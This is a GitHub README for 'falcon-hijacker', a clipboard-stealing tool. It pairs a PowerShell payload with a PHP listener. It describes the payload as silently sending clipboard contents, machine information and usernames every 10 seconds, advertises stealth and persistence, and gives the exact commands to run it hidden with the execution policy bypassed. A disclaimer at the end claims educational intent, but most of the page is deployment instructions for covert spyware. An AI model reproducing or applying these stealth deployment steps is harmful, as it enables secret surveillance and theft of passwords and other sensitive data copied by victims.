Skip to content

rgsecteam/falcon-hijacker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Falcon Clip Board Hijacker 🦅

What is Falcon-Hijacker?

Falcon Hijacker is a professional clipboard monitoring tool designed for authorized security assessments. It captures real-time clipboard data from target systems through a streamlined bash interface.

This Tool Tested On :

  • Kali Linux
  • Parrot Sec OS
  • Termux (Not tested)

📊 Advanced Monitoring

  • Live Data Stream: Real-time clipboard viewing
  • Structured Logging: Timestamped entries with metadata
  • Export Ready: Clean log format for analysis

PowerShell Payload (clipboard_logger.ps1)

  • Frequency: Checks clipboard every 10 seconds
  • Data Sent: Clipboard content + machine info + username
  • Stealth: No visible window, error suppression
  • Persistence: Runs until manually stopped

Installing and requirements

This tool require PHP for webserver, and wget for downloading dependencies. First run following command on your terminal

apt-get -y install php wget

Installing Falcon:

git clone https://github.com/rgsecteam/falcon-hijacker
cd falcon-hijacker
bash falcon.sh

Stealth Deployment:

Run the following command on windows matchin.

powershell -NoP -NonI -W h -Exec Bypass .\clipboard_logger.ps1

For Hidden Execution

Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File .\clipboard_logger.ps1" -WindowStyle Hidden

Stop Hidden Execution

For Stop Powershell Background Process.

Stop-Process -Name powershell -Force

Legal & Ethical Notice

By using the materials in this repository you agree to:

  • Use the information only for defensive, educational, or research purposes in controlled environments.
  • Follow all applicable laws and organizational policies.
  • Do not use this repository to harm others. Always obtain explicit permission before testing on systems you do not own.

Video Demo

Falcon-hijacker Demo

For More Video subcribe RGSecurityTeam YouTube Channel

Falcon-hijacker is inspired by https://github.com/techchipnet/
Big thanks to @techchipnet

About

Automation clipboard data capture tools. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit !

Topics

Resources

Stars

Watchers

Forks

Packages

 
 
 

Contributors